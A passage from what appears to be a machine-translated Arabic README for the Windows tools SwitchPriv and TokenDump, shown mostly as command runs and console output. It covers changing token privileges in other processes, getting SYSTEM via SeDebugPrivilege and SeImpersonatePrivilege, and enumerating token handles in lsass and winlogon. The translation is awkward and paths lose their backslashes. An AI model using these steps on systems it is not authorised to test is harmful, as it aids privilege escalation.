[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -d chan
[>] Trying to disable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
لإزالة الامتياز ، استخدم -خيار --remove على النحو التالي:
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -r inc
[>] Trying to remove a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 4 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
إذا كنت ترغب في اختبار امتياز معين ، فيمكنك إزالة جميع الامتيازات بخلاف ما تريد اختباره باستخدام خيار -f على النحو التالي:
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -f tim
[>] Trying to remove all token privileges except one.
[*] Target PID : 4392
[*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 1 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
=================== =======
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
يمكنك استخدام القيمة المنفصلة للفاصلة لتصفية امتيازات متعددة على النحو التالي:
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 24 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
[*] Integrity Level : High Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -f rest,back,deb
[>] Trying to remove all token privileges except one.
[*] Target PID : 24300
[*] Process Name : powershell
[>] Trying to remove privileges other than follows.
[*] SeBackupPrivilege
[*] SeRestorePrivilege
[*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
لتمكين أو تعطيل أو إزالة جميع امتيازات الرمز المميز المتاحة ، حدد all كقيمة --enable ، --disable أو --remove التذاكر:
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:Dev> .SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 6772
[*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
للعثور على العملية امتيازًا محددًا ، استخدم خيار -s على النحو التالي:
PS C:Dev> .SwitchPriv.exe -s createt
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] Memory Compression (PID : 2548)
[*] smss (PID : 372)
[*] lsass (PID : 736)
[*] csrss (PID : 584)
[*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
PS C:Dev> .SwitchPriv.exe -g -p 2548
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
إذا كنت ترغب في تعيين مستوى النزاهة ، فاستخدم --integrity التواء على النحو التالي:
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelMedium Mandatory Level Label S-1-16-8192
PS C:Dev> .SwitchPriv.exe -i 1
[>] Trying to update Integrity Level.
[*] Target PID : 3436
[*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelLow Mandatory Level Label S-1-16-4096
لتنفيذ أي إجراءات كنظام ، فإن علامة SET -S على النحو التالي ( SeDebugPrivilege و SeImpersonatePrivilege مطلوبة):
PS C:Dev> .SwitchPriv.exe -g -p 2548 -S
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
العودة إلى الأعلى
مشروع
هذه الأداة هي أداة لفحص معلومات الرمز المميز:
C:Dev>.TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
لتعداد الرمز المميز لجميع العمليات ، فقط قم -e علامة:
C:Dev>.TokenDump.exe -e
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
--snip--
6712 0 svchost.exe NT AUTHORITYLOCAL SERVICE System False False
1972 0 svchost.exe NT AUTHORITYSYSTEM System False False
[+] Got 129 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
إذا كنت ترغب في تمكين SEDEBUGPRIVILEGE ، فقم بتعيين علامة -d على النحو التالي:
C:Dev>.TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
3740 0 vm3dservice.exe NT AUTHORITYSYSTEM System False False
--snip--
عند تعيين -H مع علم -e ، يحاول Tokendump تعداد معلومات رمز المعلومات:
C:Dev>.TokenDump.exe -e -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 3272)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
0x168 0 NT AUTHORITYLOCAL SERVICE System False False Primary Anonymous
[+] Got 819 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
عند تحديد PID مع خيار -p ، تعداد Tokendup فقط عن مقابض العملية المحددة:
C:Dev>.TokenDump.exe -e -H -d -p 704
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
0x398 1 dev22h2user High False False Primary Identification
0x3C4 1 dev22h2user Medium False False Impersonation Impersonation
0x3C8 1 dev22h2user Medium False False Impersonation Impersonation
0x3D0 1 dev22h2user Medium False False Impersonation Impersonation
0x3D4 1 dev22h2user Medium False False Impersonation Impersonation
[+] Got 8 handle(s).
[*] Found 2 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Done.
لتعداد رمز الخيط المنتحل ، قم بتعيين علامة -T وكذلك -e على النحو التالي:
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
إذا كنت ترغب في تصفية هذه النتائج باستخدام اسم المستخدم المميز ، فقم بتعيين سلسلة Filter -a خيار -على النحو التالي:
C:Dev>.TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3500 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2904 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2504 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
7012 0 msdtc.exe NT AUTHORITYNETWORK SERVICE System False False
7092 0 sppsvc.exe NT AUTHORITYNETWORK SERVICE System False False
1676 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3584 0 WmiPrvSE.exe NT AUTHORITYNETWORK SERVICE System False False
1000 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
C:Dev>.TokenDump.exe -e -a network -d -H
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 768)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
0x914 0 NT AUTHORITYNETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - msdtc.exe (PID: 7012)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
0x23C 0 NT AUTHORITYNETWORK SERVICE System False False Primary Anonymous
[+] Got 27 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
للحصول على معلومات مطول لعملية محددة ، قم بتعيين علامة -s و PID الهدف كقيمة خيار -p :
C:Dev>.TokenDump.exe -s -p 5996
[>] Trying to dump process token information.
[Token Information for StartMenuExperienceHost.exe (PID: 5996)]
ImageFilePath : C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe
CommandLine : "C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x0000000000063D9A
Authentication ID : 0x000000000001DFE5
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000063D24
Integrity Level : Low
Protection Level : N/A
Session ID : 1
Elevation Type : Limited
Mandatory Policy : NoWriteUp
Elevated : False
AppContainer : True
TokenFlags : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group UseForDenyOnly
BUILTINAdministrators UseForDenyOnly
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelLow Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
========================================================================== =======
APPLICATION PACKAGE AUTHORITYYour Internet connection Enabled
APPLICATION PACKAGE AUTHORITYYour home or work networks Enabled
NAMED CAPABILITIESPackageQuery Enabled
NAMED CAPABILITIESActivitySystem Enabled
NAMED CAPABILITIESPreviewStore Enabled
NAMED CAPABILITIESCortanaPermissions Enabled
NAMED CAPABILITIESAppointmentsSystem Enabled
NAMED CAPABILITIESTeamEditionExperience Enabled
NAMED CAPABILITIESShellExperience Enabled
NAMED CAPABILITIESPackageContents Enabled
NAMED CAPABILITIESVisualElementsSystem Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
NAMED CAPABILITIESActivityData Enabled
NAMED CAPABILITIESCloudStore Enabled
NAMED CAPABILITIESTargetedContent Enabled
NAMED CAPABILITIESStoreAppInstall Enabled
NAMED CAPABILITIESStoreLicenseManagement Enabled
NAMED CAPABILITIESCortanaSettings Enabled
NAMED CAPABILITIESDependencyTarget Enabled
NAMED CAPABILITIESSearchSettings Enabled
NAMED CAPABILITIESCellularData Enabled
NAMED CAPABILITIESWifiData Enabled
PACKAGE CAPABILITYmicrosoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIESAccessoryManager Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
======================================================= =========================== ===== =============
dev22h2user GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : BUILTINAdministrators (SID: S-1-5-32-544)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x000000000016ECE6
Authentication ID : 0x000000000001DF83
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001DFE4
Integrity Level : High
Protection Level : N/A
Session ID : 1
Elevation Type : Full
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : NotLow
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelHigh Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTINAdministrators GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[*] Done.
إذا قمت بتعيين قيمة المقبض في عملية محددة كخيار -v وخيار PID AS -p وكذلك علامة -s ، فإن هذه الأداة تحصل على معلومات مطول للمقبض على النحو التالي:
C:Dev>.TokenDump.exe -s -p 7012 -v 0x23C -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]
Token User : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Owner : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Primary Group : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x000000000007DF17
Authentication ID : 0x00000000000003E4
Original ID : 0x00000000000003E7
Modified ID : 0x000000000007DEE2
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : False
AppContainer : False
TokenFlags : IsFiltered, NotLow
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
